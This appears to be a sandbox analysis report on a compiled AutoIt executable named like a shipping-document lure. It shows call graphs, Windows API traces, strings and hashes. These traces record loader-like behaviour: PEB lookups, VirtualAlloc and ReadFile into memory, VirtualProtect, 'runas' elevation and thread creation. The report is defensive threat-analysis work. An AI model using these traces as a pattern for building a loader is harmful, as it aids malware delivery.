__lseeki64_nolock 60 API calls 104742->104743 104755 96820a 104742->104755 104745 9681f3 104743->104745 104746 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104744->104746 104749 958af4 __commit 58 API calls 104745->104749 104751 968212 104745->104751 104748 96853e 104746->104748 104747 960e5b 70 API calls __read_nolock 104747->104751 104750 968546 GetLastError 104748->104750 104758 9683ce 104748->104758 104749->104755 104752 958b07 __dosmaperr 58 API calls 104750->104752 104751->104747 104753 960add __close_nolock 61 API calls 104751->104753 104751->104755 104756 9697a2 __chsize_nolock 82 API calls 104751->104756 104760 9683c1 104751->104760 104761 9683aa 104751->104761 104765 9618c1 60 API calls __lseeki64_nolock 104751->104765 104754 968552 104752->104754 104753->104751 104757 95d43d __free_osfhnd 59 API calls 104754->104757 104755->104741 104755->104751 104759 95d886 __write 78 API calls 104755->104759 104762 9618c1 60 API calls __lseeki64_nolock 104755->104762 104756->104751 104757->104758 104758->104694 104759->104755 104763 960add __close_nolock 61 API calls 104760->104763 104761->104741 104762->104755 104764 9683c8 104763->104764 104766 958b28 strtoxl 58 API calls 104764->104766 104765->104751 104766->104758 104767->104684 104768->104690 104769->104690 104771 934b83 104770->104771 104772 934c3f LoadLibraryA 104770->104772 104771->104570 104771->104571 104772->104771 104773 934c50 GetProcAddress 104772->104773 104773->104771 104775 950db6 Mailbox 59 API calls 104774->104775 104776 935240 104775->104776 104776->104578 104778 934ea3 FindResourceExW 104777->104778 104782 934ec0 104777->104782 104779 96d933 LoadResource 104778->104779 104778->104782 104780 96d948 SizeofResource 104779->104780 104779->104782 104781 96d95c LockResource 104780->104781 104780->104782 104781->104782 104782->104579 104784 934ef4 104783->104784 104785 96d9ab 104783->104785 104789 95584d 104784->104789 104787 934f02 104787->104589 104788->104579 104790 955859 
[Execution graph residue: this part of the report is the call-graph node and edge listing (node ids, function addresses such as 955891 and 10d9a98, CRT helper names such as __getptd_noexit, __lock_file, _fseek, _free, __cinit, and per-node API call counts) that the interactive graph viewer rendered. Windows APIs named in these nodes: GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, VariantClear, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, GetLastError, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteConsoleW, CloseHandle, GetFullPathNameW, GetLongPathNameW, SetCurrentDirectoryW, GetFileAttributesW, FindFirstFileW, FindClose, GetStringTypeW, CharUpperBuffW, CharLowerBuffW, IsDialogMessageW, GetClassLongW, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, TerminateProcess, Sleep, and a GetPEB helper at 10d9a98.]
API calls 106345->106351 106346 939be6 59 API calls 106346->106351 106347 939b98 59 API calls 106347->106351 106348 939837 84 API calls 106348->106351 106349 95571c 58 API calls __malloc_crt 106349->106351 106351->106344 106351->106345 106351->106346 106351->106347 106351->106348 106351->106349 106374 995887 61 API calls 2 library calls 106351->106374 106354 950c1d 106352->106354 106353 950cb5 VirtualProtect 106355 950c83 106353->106355 106354->106353 106354->106355 106355->106305 106355->106306 106356->106314 106357->106314 106358->106310 106359->106317 106360->106323 106361->106323 106362->106294 106363->106323 106365 98f192 __wsetenvp 106364->106365 106366 98f1d1 106365->106366 106369 98f1c7 106365->106369 106370 98f278 106365->106370 106366->106330 106366->106336 106369->106366 106372 9378c4 61 API calls 106369->106372 106370->106366 106373 9378c4 61 API calls 106370->106373 106371->106333 106372->106369 106373->106370 106374->106351 106375->106267 106376->106267 106377->106246 106379 9860e8 106378->106379 106380 9860cb 106378->106380 106379->106276 106380->106379 106382 9860ab 59 API calls Mailbox 106380->106382 106382->106380 106383 93107d 106388 93708b 106383->106388 106385 93108c 106386 952d40 __cinit 67 API calls 106385->106386 106387 931096 106386->106387 106389 93709b __write_nolock 106388->106389 106390 937667 59 API calls 106389->106390 106391 937151 106390->106391 106392 934706 61 API calls 106391->106392 106393 93715a 106392->106393 106419 95050b 106393->106419 106396 937cab 59 API calls 106397 937173 106396->106397 106398 933f74 59 API calls 106397->106398 106399 937182 106398->106399 106400 937667 59 API calls 106399->106400 106401 93718b 106400->106401 106402 937d8c 59 API calls 106401->106402 106403 937194 RegOpenKeyExW 106402->106403 106404 96e8b1 RegQueryValueExW 106403->106404 106409 9371b6 Mailbox 106403->106409 106405 96e943 RegCloseKey 106404->106405 106406 96e8ce 106404->106406 106407 96e955 _wcscat Mailbox __wsetenvp 106405->106407 
106405->106409 106408 950db6 Mailbox 59 API calls 106406->106408 106407->106409 106411 9379f2 59 API calls 106407->106411 106417 937de1 59 API calls 106407->106417 106418 933f74 59 API calls 106407->106418 106410 96e8e7 106408->106410 106409->106385 106412 93522e 59 API calls 106410->106412 106411->106407 106413 96e8f2 RegQueryValueExW 106412->106413 106414 96e90f 106413->106414 106416 96e929 106413->106416 106415 937bcc 59 API calls 106414->106415 106415->106416 106416->106405 106417->106407 106418->106407 106420 961940 __write_nolock 106419->106420 106421 950518 GetFullPathNameW 106420->106421 106422 95053a 106421->106422 106423 937bcc 59 API calls 106422->106423 106424 937165 106423->106424 106424->106396 106425 96fe27 106438 94f944 106425->106438 106427 96fe3d 106428 96fe53 106427->106428 106429 96febe 106427->106429 106447 939e5d 60 API calls 106428->106447 106434 93fce0 331 API calls 106429->106434 106431 96fe92 106432 97089c 106431->106432 106433 96fe9a 106431->106433 106449 999e4a 89 API calls 4 library calls 106432->106449 106448 99834f 59 API calls Mailbox 106433->106448 106437 96feb2 Mailbox 106434->106437 106437->106437 106439 94f950 106438->106439 106440 94f962 106438->106440 106441 939d3c 60 API calls 106439->106441 106442 94f991 106440->106442 106443 94f968 106440->106443 106446 94f95a 106441->106446 106444 939d3c 60 API calls 106442->106444 106445 950db6 Mailbox 59 API calls 106443->106445 106444->106446 106445->106446 106446->106427 106447->106431 106448->106437 106449->106437 106450 998d0d 106451 998d1a 106450->106451 106456 998d20 106450->106456 106452 952d55 _free 58 API calls 106451->106452 106452->106456 106453 952d55 _free 58 API calls 106454 998d31 106453->106454 106455 998d43 106454->106455 106457 952d55 _free 58 API calls 106454->106457 106456->106453 106456->106454 106457->106455 106458 931066 106463 93f76f 106458->106463 106460 93106c 106461 952d40 __cinit 67 API calls 106460->106461 106462 931076 106461->106462 106464 93f790 
106463->106464 106496 94ff03 106464->106496 106468 93f7d7 106469 937667 59 API calls 106468->106469 106470 93f7e1 106469->106470 106471 937667 59 API calls 106470->106471 106472 93f7eb 106471->106472 106473 937667 59 API calls 106472->106473 106474 93f7f5 106473->106474 106475 937667 59 API calls 106474->106475 106476 93f833 106475->106476 106477 937667 59 API calls 106476->106477 106478 93f8fe 106477->106478 106506 945f87 106478->106506 106482 93f930 106483 937667 59 API calls 106482->106483 106484 93f93a 106483->106484 106534 94fd9e 106484->106534 106486 93f981 106487 93f991 GetStdHandle 106486->106487 106488 9745ab 106487->106488 106489 93f9dd 106487->106489 106488->106489 106490 9745b4 106488->106490 106491 93f9e5 OleInitialize 106489->106491 106541 996b38 64 API calls Mailbox 106490->106541 106491->106460 106493 9745bb 106542 997207 CreateThread 106493->106542 106495 9745c7 CloseHandle 106495->106491 106543 94ffdc 106496->106543 106499 94ffdc 59 API calls 106500 94ff45 106499->106500 106501 937667 59 API calls 106500->106501 106502 94ff51 106501->106502 106503 937bcc 59 API calls 106502->106503 106504 93f796 106503->106504 106505 950162 6 API calls 106504->106505 106505->106468 106507 937667 59 API calls 106506->106507 106508 945f97 106507->106508 106509 937667 59 API calls 106508->106509 106510 945f9f 106509->106510 106550 945a9d 106510->106550 106513 945a9d 59 API calls 106514 945faf 106513->106514 106515 937667 59 API calls 106514->106515 106516 945fba 106515->106516 106517 950db6 Mailbox 59 API calls 106516->106517 106518 93f908 106517->106518 106519 9460f9 106518->106519 106520 946107 106519->106520 106521 937667 59 API calls 106520->106521 106522 946112 106521->106522 106523 937667 59 API calls 106522->106523 106524 94611d 106523->106524 106525 937667 59 API calls 106524->106525 106526 946128 106525->106526 106527 937667 59 API calls 106526->106527 106528 946133 106527->106528 106529 945a9d 59 API calls 106528->106529 106530 94613e 106529->106530 106531 
950db6 Mailbox 59 API calls 106530->106531 106532 946145 RegisterWindowMessageW 106531->106532 106532->106482 106535 98576f 106534->106535 106536 94fdae 106534->106536 106553 999ae7 60 API calls 106535->106553 106538 950db6 Mailbox 59 API calls 106536->106538 106540 94fdb6 106538->106540 106539 98577a 106540->106486 106541->106493 106542->106495 106554 9971ed 65 API calls 106542->106554 106544 937667 59 API calls 106543->106544 106545 94ffe7 106544->106545 106546 937667 59 API calls 106545->106546 106547 94ffef 106546->106547 106548 937667 59 API calls 106547->106548 106549 94ff3b 106548->106549 106549->106499 106551 937667 59 API calls 106550->106551 106552 945aa5 106551->106552 106552->106513 106553->106539 106555 97416f 106559 985fe6 106555->106559 106557 97417a 106558 985fe6 85 API calls 106557->106558 106558->106557 106560 985ff3 106559->106560 106569 986020 106559->106569 106561 986022 106560->106561 106563 986027 106560->106563 106567 98601a 106560->106567 106560->106569 106571 939328 84 API calls Mailbox 106561->106571 106564 939837 84 API calls 106563->106564 106565 98602e 106564->106565 106566 937b2e 59 API calls 106565->106566 106566->106569 106570 9395a0 59 API calls _wcsstr 106567->106570 106569->106557 106570->106569 106571->106563 106572 10d8f73 106575 10d8be8 106572->106575 106574 10d8fbf 106576 10d6618 GetPEB 106575->106576 106585 10d8c87 106576->106585 106578 10d8cb8 CreateFileW 106581 10d8cc5 106578->106581 106578->106585 106579 10d8ce1 VirtualAlloc 106580 10d8d02 ReadFile 106579->106580 106579->106581 106580->106581 106584 10d8d20 VirtualAlloc 106580->106584 106582 10d8ed4 VirtualFree 106581->106582 106583 10d8ee2 106581->106583 106582->106583 106583->106574 106584->106581 106584->106585 106585->106579 106585->106581 106586 10d8de8 CloseHandle 106585->106586 106587 10d8df8 VirtualFree 106585->106587 106588 10d9af8 GetPEB 106585->106588 106586->106585 106587->106585 106589 10d9b22 106588->106589 106589->106578

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00933B68
                                                                • IsDebuggerPresent.KERNEL32 ref: 00933B7A
                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,009F52F8,009F52E0,?,?), ref: 00933BEB
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                  • Part of subcall function 0094092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933C14,009F52F8,?,?,?), ref: 0094096E
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00933C6F
                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009E7770,00000010), ref: 0096D281
                                                                • SetCurrentDirectoryW.KERNEL32(?,009F52F8,?,?,?), ref: 0096D2B9
                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009E4260,009F52F8,?,?,?), ref: 0096D33F
                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0096D346
                                                                  • Part of subcall function 00933A46: GetSysColorBrush.USER32(0000000F), ref: 00933A50
                                                                  • Part of subcall function 00933A46: LoadCursorW.USER32(00000000,00007F00), ref: 00933A5F
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(00000063), ref: 00933A76
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(000000A4), ref: 00933A88
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(000000A2), ref: 00933A9A
                                                                  • Part of subcall function 00933A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00933AC0
                                                                  • Part of subcall function 00933A46: RegisterClassExW.USER32(?), ref: 00933B16
                                                                  • Part of subcall function 009339D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00933A03
                                                                  • Part of subcall function 009339D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933A24
                                                                  • Part of subcall function 009339D5: ShowWindow.USER32(00000000,?,?), ref: 00933A38
                                                                  • Part of subcall function 009339D5: ShowWindow.USER32(00000000,?,?), ref: 00933A41
                                                                  • Part of subcall function 0093434A: _memset.LIBCMT ref: 00934370
                                                                  • Part of subcall function 0093434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00934415
                                                                Strings
                                                                • This is a third-party compiled AutoIt script., xrefs: 0096D279
                                                                • runas, xrefs: 0096D33A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                • API String ID: 529118366-3287110873
                                                                • Opcode ID: a802d5dc1d2721991cedb342e4e90010535127f52da51ec3153e80a051a8c201
                                                                • Instruction ID: f7bc44484bd458d872dbf4d18cfeb180144c8d0cdff7e87dd3a158560eb1445d
                                                                • Opcode Fuzzy Hash: a802d5dc1d2721991cedb342e4e90010535127f52da51ec3153e80a051a8c201
                                                                • Instruction Fuzzy Hash: 2751E670E58248AECF11EBF4DC15EFDBBB8AF85750F008265FA71A6161CA704A45EF21

                                                                Control-flow Graph

                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 009349CD
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • GetCurrentProcess.KERNEL32(?,009BFAEC,00000000,00000000,?), ref: 00934A9A
                                                                • IsWow64Process.KERNEL32(00000000), ref: 00934AA1
                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00934AE7
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00934AF2
                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00934B23
                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00934B2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                • String ID:
                                                                • API String ID: 1986165174-0
                                                                • Opcode ID: 5b0843806e276afbd1712621ee7ee63d478defcb8c9d5480c35da57872c97750
                                                                • Instruction ID: dd89ae94d8056a340de094ee06c233d20fa52d28c94a601527e0c1b1429e0067
                                                                • Opcode Fuzzy Hash: 5b0843806e276afbd1712621ee7ee63d478defcb8c9d5480c35da57872c97750
                                                                • Instruction Fuzzy Hash: F091D53198E7C4DECB31CB6885541AAFFF9AF2A300F444E6ED0D793A41D224B508DB5A

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00934D8E,?,?,00000000,00000000), ref: 00934E99
                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00934D8E,?,?,00000000,00000000), ref: 00934EB0
                                                                • LoadResource.KERNEL32(?,00000000,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F), ref: 0096D937
                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F), ref: 0096D94C
                                                                • LockResource.KERNEL32(00934D8E,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F,00000000), ref: 0096D95F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                • String ID: SCRIPT
                                                                • API String ID: 3051347437-3967369404
                                                                • Opcode ID: 9c0393dee053a5f2b4747424107359e90fdaf223841b29706393c927a7be7e0a
                                                                • Instruction ID: 941de4818eebb791b8b7d35c9ab3bc933e2714f58267efae7e23d803a3865655
                                                                • Opcode Fuzzy Hash: 9c0393dee053a5f2b4747424107359e90fdaf223841b29706393c927a7be7e0a
                                                                • Instruction Fuzzy Hash: BC115A79240700BFD7258B65ED58F677BBEFBC5B21F21426CF416D6250DB61EC009A60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID:
                                                                • API String ID: 3964851224-0
                                                                • Opcode ID: d8f27eae2d20d8c0382790a727a7ff5df0d00e319f75b56574488b61bc6a01b9
                                                                • Instruction ID: be88eebeed6ba68e88928e0b9d5ddca03afc1cb9e093adbe7f175d3948809ae3
                                                                • Opcode Fuzzy Hash: d8f27eae2d20d8c0382790a727a7ff5df0d00e319f75b56574488b61bc6a01b9
                                                                • Instruction Fuzzy Hash: 4A9247716083418FD724DF28C480B2ABBE5BFC9304F14896DE99A9B262D775EC45CB92
                                                                APIs
                                                                • IsThemeActive.UXTHEME ref: 00934834
                                                                  • Part of subcall function 0095336C: __lock.LIBCMT ref: 00953372
                                                                  • Part of subcall function 0095336C: DecodePointer.KERNEL32(00000001,?,00934849,00987C74), ref: 0095337E
                                                                  • Part of subcall function 0095336C: EncodePointer.KERNEL32(?,?,00934849,00987C74), ref: 00953389
                                                                  • Part of subcall function 009348FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00934915
                                                                  • Part of subcall function 009348FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0093492A
                                                                  • Part of subcall function 00933B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00933B68
                                                                  • Part of subcall function 00933B3A: IsDebuggerPresent.KERNEL32 ref: 00933B7A
                                                                  • Part of subcall function 00933B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F52F8,009F52E0,?,?), ref: 00933BEB
                                                                  • Part of subcall function 00933B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00933C6F
                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00934874
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                • String ID: 0`
                                                                • API String ID: 1438897964-672551491
                                                                • Opcode ID: 154d43640959a685727978e8f8b1083f730711e63acceef5f9e50dbf197d6f0f
                                                                • Instruction ID: 33411dc06ed9e83089961d5352273c9ef1cb934f667479b30bc034c3b389a54b
                                                                • Opcode Fuzzy Hash: 154d43640959a685727978e8f8b1083f730711e63acceef5f9e50dbf197d6f0f
                                                                • Instruction Fuzzy Hash: 9B118C719183019BC700EF69EC45A5AFFE8EBC5750F118A1EF550872B1DBB09548DF92
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,0096E398), ref: 0099446A
                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0099447B
                                                                • FindClose.KERNEL32(00000000), ref: 0099448B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFind$AttributesCloseFirst
                                                                • String ID:
                                                                • API String ID: 48322524-0
                                                                • Opcode ID: e08ab9f5a5813b4126693c7e6d5ddc9ec05bbbace8e4d6e272dfcb97b65179e1
                                                                • Instruction ID: dd6ec7676f3b4ca4a125e691581e71ca754fd318d99b9113a88140a274690820
                                                                • Opcode Fuzzy Hash: e08ab9f5a5813b4126693c7e6d5ddc9ec05bbbace8e4d6e272dfcb97b65179e1
                                                                • Instruction Fuzzy Hash: FDE0D833424500675A146B3CEC1D8E977DC9E05375F100715F835C11E0E7745900A596
                                                                Strings
                                                                • Variable must be of type 'Object'., xrefs: 00973E62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Variable must be of type 'Object'.
                                                                • API String ID: 0-109567571
                                                                • Opcode ID: f6be406430470bce12fea3580e3afa271909e43f0a11dc0a15b82175864508d6
                                                                • Instruction ID: 0ad1a8823c0511c7147ad982f91c77836d6a45f2b8393d87e9aab1df6c75299c
                                                                • Opcode Fuzzy Hash: f6be406430470bce12fea3580e3afa271909e43f0a11dc0a15b82175864508d6
                                                                • Instruction Fuzzy Hash: C2A29D75A00209CFCB24CF58C480AAEB7B6FF59314F248459E81AAB391D775ED42CF91
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00940A5B
                                                                • timeGetTime.WINMM ref: 00940D16
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00940E53
                                                                • Sleep.KERNEL32(0000000A), ref: 00940E61
                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00940EFA
                                                                • DestroyWindow.USER32 ref: 00940F06
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00940F20
                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00974E83
                                                                • TranslateMessage.USER32(?), ref: 00975C60
                                                                • DispatchMessageW.USER32(?), ref: 00975C6E
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00975C82
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                • API String ID: 4212290369-3242690629
                                                                • Opcode ID: bd7f06ec63d2ed271d63a5c10103428df0a78bad12a625ae74c962288f81a5b6
                                                                • Instruction ID: 5a081cfc46a1998f384aaacbebd4e1e79cc29ea4c0927a2d511e8c832c6bf32f
                                                                • Opcode Fuzzy Hash: bd7f06ec63d2ed271d63a5c10103428df0a78bad12a625ae74c962288f81a5b6
                                                                • Instruction Fuzzy Hash: C6B2BE71608741DFD728DF24C884FAAB7E8BFC4304F15891DE59A972A1DBB5E844CB82

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00998F5F: __time64.LIBCMT ref: 00998F69
                                                                  • Part of subcall function 00934EE5: _fseek.LIBCMT ref: 00934EFD
                                                                • __wsplitpath.LIBCMT ref: 00999234
                                                                  • Part of subcall function 009540FB: __wsplitpath_helper.LIBCMT ref: 0095413B
                                                                • _wcscpy.LIBCMT ref: 00999247
                                                                • _wcscat.LIBCMT ref: 0099925A
                                                                • __wsplitpath.LIBCMT ref: 0099927F
                                                                • _wcscat.LIBCMT ref: 00999295
                                                                • _wcscat.LIBCMT ref: 009992A8
                                                                  • Part of subcall function 00998FA5: _memmove.LIBCMT ref: 00998FDE
                                                                  • Part of subcall function 00998FA5: _memmove.LIBCMT ref: 00998FED
                                                                • _wcscmp.LIBCMT ref: 009991EF
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999824
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999837
                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00999452
                                                                • _wcsncpy.LIBCMT ref: 009994C5
                                                                • DeleteFileW.KERNEL32(?,?), ref: 009994FB
                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00999511
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00999522
                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00999534
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
